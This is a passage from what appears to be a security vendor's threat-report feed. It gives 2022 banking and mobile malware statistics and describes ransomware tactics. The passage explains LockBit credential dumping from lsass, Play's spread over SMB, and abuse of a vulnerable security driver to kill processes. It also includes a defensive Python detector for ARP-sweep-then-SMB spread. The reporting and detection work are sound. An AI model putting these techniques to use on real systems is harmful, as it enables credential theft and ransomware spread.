BitStealer Trojan-Banker.MSIL.BitStealer 1.6

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Geography of attacked users

In this year’s report, we calculated the percentage of Kaspersky users in each country that encountered a financial cyberthreat relative to all users that were attacked by financial malware. This approach helps us identify the countries with the highest risk of computer infection due to financial malware.

The 2022 report shows the distribution of financial malware attacks across different countries. The Top 20 countries in the list below account for more than half of all infection attempts.

Top 20 countries and territories by share of attacked users

Country or territory* %**
Turkmenistan 6.6
Afghanistan 6.5
Tajikistan 4.9
China 3.3
Uzbekistan 3.3
Yemen 3.3
Sudan 2.9
Mauritania 2.8
Egypt 2.5
Azerbaijan 2.5
Venezuela 2.5
Paraguay 2.5
Switzerland 2.4
Syria 2.4
Libya 2.3
Algeria 2.2
Iraq 2.0
Indonesia 1.9
Bangladesh 1.8
Pakistan 1.8

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

The data shows that Turkmenistan has the highest share of attacked users with 6.6%, followed by Afghanistan and Tajikistan with 6.5% and 4.9% respectively.

Types of users attacked

The 2022 numbers show that the distribution of financial cyberthreats remained relatively stable, with consumers (61.8%) still being the primary target and corporate users (38.2%) accounting for a smaller percentage of attacks. The 2022 increase is relatively small, at less than 1%, and does not represent a significant shift in the overall distribution of attacks.

Malware attack distribution by type (corporate vs consumer), 2021 – 2022

This can be attributed to the fact that the world has become accustomed to the new style of post-pandemic work, with many companies continuing to operate in remote or hybrid work modes. The trend of working from home or remotely is no longer new, and many companies have adapted to it. As a result, they have also learned how to deal with potential threats and have implemented measures to ensure the security of their employees’ devices and data. Now employees are likely using similar devices and security measures for personal and work purposes, making it harder for cybercriminals to differentiate between consumer and corporate targets.

Mobile banking malware

We have been observing a steady and steep downward trend in the number of Android users affected by banking malware for at least four years now. In 2022, the number of Android users attacked with banking malware was 57,219, more than 2.5 times lower than the figure reported in the previous year, a drop of around 55%.

This trend marked a continuation from previous years, with the number of Android users attacked dropping by 55% in 2020 and by almost 50% in 2021, resulting in a total of 147,316 users affected in 2021.

Number of Android users attacked by banking malware by month, 2020 – 2022

Despite the steady decline in the number of Android users affected by banking malware, it is important for users not to become complacent, as cybercriminals continue to evolve their malware and find new ways to carry out attacks. In 2022, we identified over 200,000 new banking Trojan installers, which is twice the number reported in the previous year.

Comparing the most active mobile malware families of 2021 to those of 2022, we see some significant changes. In 2021, Agent was the most prevalent mobile malware, representing 26.9% of attacks. However, in 2022, Bian surpassed Agent as the most active mobile malware family, with 24.25% attacks compared to Agent’s 21.57%.

As for the other malware families on the list, Anubis (11.24%) and Faketoken (10.53%) maintained their positions in the Top 5, respectively. Asacub also remained in the Top 5 list, with almost 10% of attacks, but dropped to fifth place from its third-place ranking in 2021.

Top 10 Android banking malware families

Name Verdicts %*
Bian Trojan-Banker.AndroidOS.Bian 24.25
Agent Trojan-Banker.AndroidOS.Agent 21.57
Anubis Trojan-Banker.AndroidOS.Anubis 11.24
Faketoken Trojan-Banker.AndroidOS.Faketoken 10.53
Asacub Trojan-Banker.AndroidOS.Asacub 9.91
Svpeng Trojan-Banker.AndroidOS.Svpeng 6.08
Cebruser Trojan-Banker.AndroidOS.Cebruser 5.23
Gustuff Trojan-Banker.AndroidOS.Gustuff 3.13
Bray Trojan-Banker.AndroidOS.Bray 2.27
Sova Trojan-Banker.AndroidOS.Sova 2.14

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Svpeng, which was the third most prevalent malware family in 2021, with 21.4% of attacks, dropped to sixth place in 2022, with 6.08% attacks. Meanwhile, Cebruser, Gustuff, Bray, and Sova entered the list.

Geography of attacked users

The geographical distribution of users affected by Android banking malware shows some differences between the Top 10 lists for 2021 and 2022. In the first list (2021), Japan had the highest percentage of targeted users with 2.18%, followed by Spain with 1.55%, while in the second list (2022), Spain had the highest percentage with 1.96%, followed by Saudi Arabia with 1.11%.

Australia appeared in both lists, with a 0.48% share in the first list and a 1.09% share in the second. Turkey also appeared in both lists, with a 0.71% share in the first list and a 0.99% share in the second. Italy had a 0.29% share in the first list and a 0.17% share in the second list, while Japan had a 0.30% share in the second list.

Top 10 countries and territories, 2021

Country or territory* %**
Japan 2.18
Spain 1.55
Turkey 0.71
France 0.57
Australia 0.48
Germany 0.46
Norway 0.31
Italy 0.29
Croatia 0.28
Austria 0.28

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Top 10 countries and territories, 2022

Country or territory* %**
Spain 1.96
Saudi Arabia 1.11
Australia 1.09
Turkey 0.99
Switzerland 0.48
Japan 0.30
Colombia 0.19
Italy 0.17
India 0.16
South Korea 0.16

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Overall, the two lists show that banking malware continues to be a global threat, affecting users in different countries and regions.

Conclusion

Year 2022 demonstrated that banking malware attacks continue to decline, both for PC and mobile malware. Still, the number of such attacks remains significant and users, as always, need to stay vigilant. At the same time, cybercriminals are switching their focus to cryptocurrency, as these attacks are harder to track. With new payment systems emerging, we are sure to see new attacks in the future and, potentially, yet more targeting of cryptocurrency.

Additionally, financial phishing schemes remain a top category in all phishing, with fraudsters continuing to hunt for banking and other sensitive data, exploiting trusted brands. This activity isn’t likely to die down, and we will continue to witness new schemes emerge on a regular basis.

For protection against financial threats, Kaspersky recommends that users:

  • Install only applications obtained from reliable sources
  • Refrain from approving rights or permissions requested by applications without first ensuring they match the application’s feature set
  • Never open links or documents included in unexpected or suspicious-looking messages
  • Use a reliable security solution, such as Kaspersky Premium, that protects you and your digital infrastructure from a wide range of financial cyberthreats

To protect your business from financial malware, Kaspersky security experts recommend:

  • Providing cybersecurity awareness training, especially for employees responsible for accounting, that includes instructions on how to detect phishing pages
  • Improving the digital literacy of staff
  • Enabling a Default Deny policy for critical user profiles, particularly those in financial departments, which ensures that only legitimate web resources can be accessed
  • Installing the latest updates and patches for all software used
The mobile malware threat landscape in 2022
https://securelist.com/mobile-threat-report-2022/108844/
Mon, 27 Feb 2023 10:05:35 +0000

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Figures of the year

In 2022, Kaspersky mobile products and technology detected:

  • 1,661,743 malicious installers
  • 196,476 new mobile banking Trojans
  • 10,543 new mobile ransomware Trojans

Mobile attacks leveled off after decreasing in the second half of 2021 and remained around the same level throughout 2022.

Kaspersky mobile cyberthreat detection dynamics in 2020–2022

Cybercriminals continued to use legitimate channels to spread malware.

Similarly to 2021, we found a modified WhatsApp build with malicious code inside in 2022. It was notable for spreading via ads inside the popular Snaptube app and through the Vidmate in-app store.

The spread of malware through Google Play continued as well. In particular, we found several mobile Trojan subscribers on Google’s official Android app marketplace in 2022. These secretly signed users up for paid services. In addition to the previously known Jocker and MobOk families, we discovered a new family, named Harly and active since 2020. Harly malware programs were downloaded a total of 2.6 million times from Google Play in 2022. Also last year, fraudsters abused the marketplace to spread various scam apps, which promised welfare payments or lucrative energy investments.

Mobile banking Trojans were not far behind. Despite Europol having shut down the servers of FluBot (also known as Polph or Cabassous, the largest mobile botnet in recent years), users had to stay on guard, as Google Play still contained downloaders for other banking Trojan families, such as Sharkbot, Anatsa/Teaban, Octo/Coper, and Xenomorph, all masquerading as utilities. For instance, the Sharkbot downloader in the screenshot below imitates a file manager. This type of software is capable of requesting permission to install further packages the Trojan needs to function on the unsuspecting user’s device.

The Sharkbot banking Trojan downloader on Google Play

Exploitation of popular game titles, where malware and unwanted software mimicked a pirated version of a game or game cheats, remained a popular mobile spread vector in 2022. The most frequently imitated titles included Minecraft, Roblox, Grand Theft Auto, PUBG, and FIFA. The malware spread primarily through questionable web sites, social media groups, and other unofficial channels.

Mobile cyberthreat statistics

Installer numbers

We detected 1,661,743 malware or unwanted software installers in 2022, which is 1,803,013 fewer than in 2021. The number had been declining gradually since a 2020 increase.

Number of detected malicious installation packages in 2019–2022

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type in 2021 and 2022

RiskTool-type potentially unwanted software (27.39%) topped the rankings in 2022, replacing the previous leader, adware (24.05%). That said, the share of RiskTool had decreased by 7.89 percentage points, and the share of adware, by 18.38 percentage points year-on-year.

Various Trojan-type malware was third in the rankings with 15.56%, its cumulative share increasing by 6.7 percentage points.

Geography of mobile threats

TOP 10 countries by share of users attacked by mobile malware

Country* %**
1 China 17.70
2 Syria 15.61
3 Iran 14.53
4 Yemen 14.39
5 Iraq 8.44
6 Saudi Arabia 6.78
7 Kenya 5.52
8 Switzerland 5.44
9 Pakistan 5.21
10 Tanzania 5.15

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security (under 10,000).
** Unique users attacked as a percentage of all Kaspersky mobile security users in the country.

China had the largest share of users who experienced a mobile malware attack: 17.70%. Of these, 16.06% got hit by SMS-abusing malware that we detected as Trojan.AndroidOS.Najin.a.

Other countries with significant shares of attacked users were Syria (15.61%) and Iran (14.53%), where the most frequently encountered mobile cyberthreat was Trojan-Spy.AndroidOS.Agent.aas, a WhatsApp modification carrying a spy module.

Distribution of attacks by type of software used

Distribution of attacks by type of software used in 2022

Similarly to previous years, 2022 saw malware used in most mobile attacks (67.78%). The shares of attacks that used Adware- and RiskWare-type applications had increased to 26.91% from 16.92% in 2021 and to 5.31% from 2.38% in 2021, respectively.

Mobile adware

The Adlo family accounted for the largest share of detected installers (22.07%) in 2022. These are useless fake apps that download ads. Adlo replaced the previous leader, the Ewind family, which had a share of 16.46%.

TOP 10 most frequently detected adware families in 2022

Family %*
1 Adlo 22.07
2 Ewind 16.46
3 HiddenAd 15.02
4 MobiDash 11.30
5 Dnotua 5.08
6 FakeAdBlocker 5.02
7 Agent 4.02
8 Fyben 3.94
9 Notifyer 3.19
10 Dowgin 1.38

* The share of the adware-type family in the total number of adware installers detected.

RiskTool-type apps

The SMSreg family retained its lead by number of detected RiskTool-type apps: 36.47%. The applications in this family make payments (for example by transferring cash to other individuals or paying for mobile service subscriptions) by sending text messages without explicitly notifying the user.

TOP 10 most frequently detected RiskTool families, 2022

Family %*
1 SMSreg 36.47
2 Dnotua 26.19
3 Robtes 24.41
4 Resharer 2.67
5 Agent 2.39
6 SmsSend 1.29
7 SpyLoan 1.29
8 Skymobi 1.10
9 SmsPay 0.71
10 Wapron 0.66

* The share of the RiskTool family in the total number of RiskTool installers detected.

TOP 20 most frequently detected mobile malware programs

Note that the malware rankings below exclude riskware or potentially unwanted software, such as RiskTool or adware.

Verdict %*
1 DangerousObject.Multi.Generic 18.97
2 Trojan-SMS.AndroidOS.Fakeapp.d 8.65
3 Trojan.AndroidOS.Generic 6.70
4 Trojan-Spy.AndroidOS.Agent.aas 6.01
5 Trojan.AndroidOS.Fakemoney.d 4.65
6 Trojan.AndroidOS.GriftHorse.l 4.32
7 Trojan-Dropper.AndroidOS.Agent.sl 3.22
8 DangerousObject.AndroidOS.GenericML 2.96
9 Trojan-SMS.AndroidOS.Fakeapp.c 2.37
10 Trojan.AndroidOS.Fakeapp.ed 2.19
11 Trojan.AndroidOS.GriftHorse.ah 2.00
12 Trojan-Downloader.AndroidOS.Agent.kx 1.72
13 Trojan.AndroidOS.Soceng.f 1.67
14 Trojan-Dropper.AndroidOS.Hqwar.hd 1.49
15 Trojan.AndroidOS.Fakeapp.dw 1.43
16 Trojan-Ransom.AndroidOS.Pigetrl.a 1.43
17 Trojan-Downloader.AndroidOS.Necro.d 1.40
18 Trojan-SMS.AndroidOS.Agent.ado 1.36
19 Trojan-Dropper.AndroidOS.Hqwar.gen 1.35
20 Trojan-Spy.AndroidOS.Agent.acq 1.34

* Unique users attacked by the malware as a percentage of all attacked Kaspersky mobile security users.

First and third places went to DangerousObject.Multi.Generic (18.97%) and Trojan.AndroidOS.Generic (6.70%), respectively, which are verdicts we use for malware detected with cloud technology. Cloud technology is triggered whenever the antivirus databases lack data for detecting a piece of malware, but the antivirus company’s cloud already contains information about the object. This is essentially how the latest malware types are detected.

The Trojans in second and ninth places (8.65% and 2.37%) belonged to the Trojan-SMS.AndroidOS.Fakeapp family. This type of malware is capable of sending text messages and calling preset numbers, displaying ads, and hiding its icon on the device.

WhatsApp modifications equipped with a spy module, detected as Trojan-Spy.AndroidOS.Agent.aas (6.01%) and Trojan-Spy.AndroidOS.Agent.acq (1.34%) were in fourth and twentieth positions, respectively.

Scam apps detected as Trojan.AndroidOS.Fakemoney.d (4.65%) were the fifth-largest category. These try to trick users into believing that they are filling out an application for a welfare payout.

Members of the Trojan.AndroidOS.GriftHorse family, which subscribe the user to premium SMS services, took both sixth and eleventh places (4.32% and 2%, respectively).

The banking Trojan dropper Trojan-Dropper.AndroidOS.Agent.sl (3.22%) was seventh.

The verdict of DangerousObject.AndroidOS.GenericML (2.96%) sank to eighth place. The verdict is assigned to files recognized as malicious by our machine-learning systems.

Tenth place was taken by Trojan.AndroidOS.Fakeapp.ed (2.19%). This verdict refers to a category of fraudulent apps which target users in Russia by posing as a stock-trading platform for investing in gas.

Trojan-Downloader.AndroidOS.Agent.kx (1.72%) rose to twelfth position. This type of malware is distributed as part of legitimate software, downloading advertising modules.

Trojan.AndroidOS.Soceng.f (1.67%), in thirteenth place, sends text messages to people on your contact list, deletes files on the SD card, and overlays the interfaces of popular apps with its own window.

Malware from the Trojan-Dropper.AndroidOS.Hqwar family, which unpacks and runs various banking Trojans, occupied fourteenth and nineteenth places (1.49 and 1.35%).

Trojan.AndroidOS.Fakeapp.dw was fifteenth (1.43%). The verdict applies to a variety of scam apps, such as those supposedly offering the user to earn some extra cash.

Trojan-Ransom.AndroidOS.Pigetrl.a (1.43%) took sixteenth place. Unlike classic Trojan-Ransom malware, which typically demands a ransom, it simply locks the screen and asks the user to enter a code. The application offers no instructions on obtaining the code, which is embedded in the program itself.

Trojan-Downloader.AndroidOS.Necro.d sank to seventeenth position (1.4%). This malware is capable of downloading, installing, and running other applications when commanded by its operators.

Trojan-SMS.AndroidOS.Agent.ado, which sends text messages to shortcodes, was eighteenth (1.36%).

Mobile banking Trojans

We detected 196,476 mobile banking Trojan installers in 2022, a year-on-year increase of 100% and the highest figure in the past six years.

The Trojan-Banker.AndroidOS.Bray family accounted for two-thirds (66.40%) of all detected banking Trojans. This family attacked mostly users in Japan. It was followed by the Trojan-Banker.AndroidOS.Fakecalls family (8.27%) and Trojan-Banker.AndroidOS.Bian (3.25%).

The number of mobile banking Trojan installers detected by Kaspersky in 2019–2022

Although the number of detected malware installers rose in 2022, mobile banking Trojan attacks had been decreasing since a 2020 rise.

The number of mobile banking Trojan attacks in 2021–2022

TOP 10 most frequently detected mobile banking Trojans

Verdict %*
1 Trojan-Banker.AndroidOS.Bian.h 28.74
2 Trojan-Banker.AndroidOS.Anubis.t 11.50
3 Trojan-Banker.AndroidOS.Svpeng.q 5.50
4 Trojan-Banker.AndroidOS.Agent.ep 5.25
5 Trojan-Banker.AndroidOS.Agent.eq 4.51
6 Trojan-Banker.AndroidOS.Gustuff.d 3.88
7 Trojan-Banker.AndroidOS.Asacub.ce 3.54
8 Trojan-Banker.AndroidOS.Sova.g 2.72
9 Trojan-Banker.AndroidOS.Faketoken.z 2.01
10 Trojan-Banker.AndroidOS.Bray.f 1.71

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security users attacked by banking threats.

Of all mobile banking Trojans that were active in 2022, Trojan-Banker.AndroidOS.Bian.h (28.74%) accounted for the largest share of attacked users, more than half of those in Spain.

TOP 10 countries by share of users attacked by mobile banking Trojans

Country* %**
1 Spain 1.96
2 Saudi Arabia 1.11
3 Australia 1.09
4 Turkey 0.99
5 China 0.73
6 Switzerland 0.48
7 Japan 0.30
8 Colombia 0.19
9 Italy 0.17
10 India 0.16

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.

Spain had the largest share of unique users attacked by mobile financial threats in 2022 (1.96%), with 85.90% of the affected users encountering the aforementioned Trojan-Banker.AndroidOS.Bian.h.

It was followed by Saudi Arabia (1.11%), also due to Trojan-Banker.AndroidOS.Bian.h, which affected 97.92% of users in that country.

Australia (1.09%) was third, with 98% of the users who encountered banking Trojans there attacked by Trojan-Banker.AndroidOS.Gustuff.

Mobile ransomware Trojans

We detected 10,543 mobile ransomware Trojan installers in 2022, which was 6,829 fewer than the 2021 figure.

The number of mobile ransomware Trojan installers detected by Kaspersky in 2019–2022

The number of mobile ransomware Trojan attacks also continued to decline, a process that started in late 2021.

The number of mobile ransomware Trojan attacks in 2021–2022

TOP 10 most frequently detected mobile ransomware Trojans

Verdict %*
1 Trojan-Ransom.AndroidOS.Pigetrl.a 75.10
2 Trojan-Ransom.AndroidOS.Rkor.br 3.70
3 Trojan-Ransom.AndroidOS.Small.as 1.81
4 Trojan-Ransom.AndroidOS.Rkor.bs 1.60
5 Trojan-Ransom.AndroidOS.Rkor.bi 1.48
6 Trojan-Ransom.AndroidOS.Rkor.bt 1.19
7 Trojan-Ransom.AndroidOS.Fusob.h 1.05
8 Trojan-Ransom.AndroidOS.Rkor.ch 0.99
9 Trojan-Ransom.AndroidOS.Rkor.bp 0.92
10 Trojan-Ransom.AndroidOS.Congur.cw 0.90

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security users attacked by ransomware Trojans.

Trojan-Ransom.AndroidOS.Pigetrl.a remained the leading ransomware Trojan family in 2022 (75.10%). It was also one of the TOP 20 most frequently detected mobile malware types. Russia accounted for as much as 92.74% of detections.

That malware family was followed by Trojan-Ransom.AndroidOS.Rkor, which blocks the screen and demands that the user pay a fine for some illegal content they had supposedly viewed. Members of this family took six out of ten places in our rankings, with as many as 65.27% of attacked users located in Kazakhstan.

TOP 10 countries by share of users attacked by mobile ransomware Trojans

Country* %**
1 China 0.65
2 Yemen 0.49
3 Kazakhstan 0.36
4 Iraq 0.08
5 Azerbaijan 0.05
6 Kyrgyzstan 0.05
7 Switzerland 0.04
8 Saudi Arabia 0.04
9 Lebanon 0.04
10 Egypt 0.03

* Excluded from the rankings are countries with relatively few Kaspersky mobile security users (under 10,000).
** Unique users attacked by mobile ransomware Trojans as a percentage of all Kaspersky mobile security users in the country.

We observed the highest shares of users attacked by mobile ransomware Trojans in 2022 in China (0.65%), Yemen (0.49%), and Kazakhstan (0.36%).

Users in China mostly encountered Trojan-Ransom.AndroidOS.Congur.y, most users in Yemen were affected by Trojan-Ransom.AndroidOS.Pigetrl.a, and a majority of users in Kazakhstan were hit by Trojan-Ransom.AndroidOS.Rkor.br.

Conclusion

Cybercriminal activity leveled off in 2022, with attack numbers remaining steady after a decrease in 2021. That said, cybercriminals are still working on improving both malware functionality and spread vectors. Malware is increasingly spreading through legitimate channels, such as official marketplaces and ads in popular apps. This is true for both scam apps and dangerous mobile banking malware.

Potentially unwanted applications (RiskWare) accounted for a majority of newly detected threats in 2022, replacing the previous leader, adware. Most mobile cyberattacks used malware as before.

Crimeware trends: self-propagation and driver exploitation
https://securelist.com/crimeware-report-ransomware-tactics-vulnerable-drivers/108197/
Mon, 05 Dec 2022 10:00:58 +0000

Introduction

If one sheep leaps over the ditch, the rest will follow. This is an old saying, found in various languages, and it can be applied to ransomware developers. In previous blog posts, we highlighted an increase in the popularity of platform-independent languages and ESXi support, and recently, we wrote about ransomware borrowing these propagation methods.

Last month, we wrote in our crimeware reporting service about further ransomware variants that now had their own methods for copying and executing malware on other machines within the network. We also wrote about a case of abusing vulnerable drivers, something that might become popular in the future as well. In this blog post, we provide excerpts from these reports.

For questions or more information on our crimeware reporting service, please contact crimewareintel@kaspersky.com.

Some ransomware statistics

During the first ten months of 2022, the share of users affected by targeted ransomware among all users affected by all types of malware almost doubled year-on-year, reaching 0.026%.

Share of users attacked by targeted ransomware, January–October 2021 and January–October 2022

LockBit

LockBit is one of the most popular, innovative and rapidly developing current ransomware families. Recently, we noticed that a new option was added to the LockBit builder site, as can be seen below:

New functionality created by LockBit developers

In addition to PsExec, the most common way of spreading ransomware overall, LockBit now supports “self-spread”. Naturally, we were interested in the details of this self-spreading mechanism, and especially in how it works.

The ransomware is installed as a service onto the infected machine. This service makes a call to netapi32.DsGetDcNameW to get the details of the domain that the infected machine belongs to and then creates a named pipe. When this operation is complete, the module dumps the operating system credentials, obtaining the handles from explorer.exe and lsass.exe with the help of the named pipe created earlier.

This is where it stops. Essentially, there is no self-spreading: what the option actually does is credential dumping. It does fit the broader trend we are seeing these days, with more and more functionality embedded in ransomware to reduce reliance on other tools (in this case, tools like Mimikatz are no longer necessary), but genuine self-spreading is absent.

Play

Play is a new ransomware variant that we recently ran into—it has no code similarities with other ransomware samples. The ransomware is highly obfuscated, which complicates analysis.

Play is in an early development stage. For example, there is no leak site and victims have to contact the criminals via the email address in the ransom note. Despite this, Play also contains functionality that lately has been found in other ransomware variants: self-propagation.

Play collects different IPs on the same subnet and tries to discover SMB resources with the help of NetShareEnum(), which results in ARP traffic, as can be seen from the Wireshark screenshot below. The idea behind this activity is to spread the ransomware to other machines on the same network.

ARP requests made by Play ransomware

Once an SMB resource is found, the ransomware establishes a connection, tries to mount the share, and attempts to copy and execute itself on the remote system. This can be seen in the Wireshark screenshot below.

SMB connections
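The sequence described above, an ARP sweep of the local subnet followed by SMB connections to the hosts it turned up, is a pattern a network sensor can flag. The following Python is an added detection example, not code from the report or from the Play sample; it runs over constructed Zeek-style log lines, and the thresholds and log format are assumptions.

```python
import re
from collections import defaultdict

# Thresholds are assumptions made for this example, not figures from the report.
ARP_SWEEP_MIN = 8      # distinct who-has targets from one source host
SMB_FOLLOW_MIN = 2     # distinct swept hosts then contacted on TCP/445
WINDOW_SECONDS = 120   # the ARP sweep and SMB follow-up must fit in this window

ARP_RE = re.compile(r"^(\d+) arp (\S+) who-has (\S+)$")
CONN_RE = re.compile(r"^(\d+) conn (\S+) -> (\S+):(\d+)$")

# Constructed sample log (Zeek-like, not a real capture): 10.0.1.50 sweeps its
# /24 with ARP and then opens SMB sessions to three hosts it found; 10.0.1.20 is
# a benign client that only talks to the file server 10.0.1.1.
SAMPLE_LOG = "\n".join(
    [f"1700000001 arp 10.0.1.50 who-has 10.0.1.{i}" for i in range(1, 11)]
    + [f"1700000005 conn 10.0.1.50 -> 10.0.1.{i}:445" for i in (2, 7, 9)]
    + ["1700000002 arp 10.0.1.20 who-has 10.0.1.1",
       "1700000003 conn 10.0.1.20 -> 10.0.1.1:445"]
)

def parse_events(text):
    """Turn log lines into (kind, timestamp, src, dst, port) tuples."""
    events = []
    for line in text.splitlines():
        m = ARP_RE.match(line)
        if m:
            events.append(("arp", int(m.group(1)), m.group(2), m.group(3), None))
            continue
        m = CONN_RE.match(line)
        if m:
            events.append(("conn", int(m.group(1)), m.group(2), m.group(3), int(m.group(4))))
    return events

def find_smb_spreaders(text):
    """Return {src: (swept_host_count, smb_target_count)} for every source host
    whose ARP sweep is followed, within the window, by SMB connections to
    several of the hosts it swept."""
    arp = defaultdict(dict)   # src -> {target: first_seen_ts}
    smb = defaultdict(dict)   # src -> {dst: first_seen_ts}
    for kind, ts, src, dst, port in parse_events(text):
        if kind == "arp":
            arp[src].setdefault(dst, ts)
        elif kind == "conn" and port == 445:
            smb[src].setdefault(dst, ts)
    alerts = {}
    for src, targets in arp.items():
        first_arp = min(targets.values())
        swept = {t for t, ts in targets.items() if ts - first_arp <= WINDOW_SECONDS}
        if len(swept) < ARP_SWEEP_MIN:
            continue
        followed = {d for d, ts in smb.get(src, {}).items()
                    if d in swept and first_arp <= ts <= first_arp + WINDOW_SECONDS}
        if len(followed) >= SMB_FOLLOW_MIN:
            alerts[src] = (len(swept), len(followed))
    return alerts
```

Calling find_smb_spreaders(SAMPLE_LOG) reports only 10.0.1.50, with 10 hosts swept and 3 then contacted on port 445; the benign client 10.0.1.20 falls below the sweep threshold.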

Driver abuse

Drivers can contain vulnerabilities that attackers may be able to exploit. One such driver is Anti Rootkit by Avast. Although it was previously abused by AvosLocker, the vulnerabilities that are being exploited now (CVE-2022-26522 and CVE-2022-26523) were not known back then. They allow attackers to escalate their privileges in the targeted system or perform a sandbox escape. The vulnerabilities were described in detail by SentinelLabs and fixed at the beginning of 2022. We know that at least two ransomware families, AvosLocker and Cuba, exploit these.

There are a few advantages to using the trick with vulnerable drivers. Firstly, it disables other security products in the system. Secondly, what gets installed is a component of a legitimate security solution, which results in fewer alerts being raised. Thirdly, by exploiting the driver, the attackers can kill processes running on the machine.

The process killing function

Conclusion

Ransomware developers keep an eye on their competitors’ work. If one of them implements certain functionality that works well, chances are that others will follow suit. This keeps their ransomware more interesting for their affiliates. The self-propagation of ransomware is a prime example of that.

Therefore, we believe that abuse of vulnerable drivers could become yet another typical ransomware-group TTP that other groups will borrow in the future.

Intelligence reports can help you to protect yourself against these threats. If you want to stay up to date on the latest TTPs used by criminals or if you have questions about our private reports, please contact crimewareintel@kaspersky.com.
